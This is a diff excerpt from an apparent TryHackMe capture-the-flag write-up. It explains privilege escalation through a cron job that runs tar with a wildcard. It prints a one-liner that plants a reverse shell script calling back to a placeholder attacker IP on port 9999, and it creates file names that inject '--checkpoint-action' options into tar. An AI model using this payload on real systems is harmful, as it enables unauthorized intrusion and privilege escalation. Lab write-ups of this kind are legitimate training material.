0x0m/writeups/tryhackme/sea_surfer/README.md

 tar -zcf /home/kyle/backups/invoices.tgz *
 ```

-We can do a tar wildcard exploit.
+In the script, we can see that it creates a backup in /home/kyle which we cannot access.
+We cannot do this as our current user, so it means that we may be able to escalate our priviliges with this.
+We can try to do a tar wildcard exploit.

 ```bash
 cd /var/www/internal/invoices; echo "/bin/bash -c 'bash -i >& /dev/tcp/KALI_IP/9999 0>&1'" > shell.sh; echo "" > "--checkpoint-action=exec=sh shell.sh"; echo "" > --checkpoint=1; chmod 777 shell.sh
 ```

-When the cron job runs again in a minute, we get a shell on our end.
+When the cron job runs again in a minute, we get a shell on our end as `kyle`.

 ## Root Privesc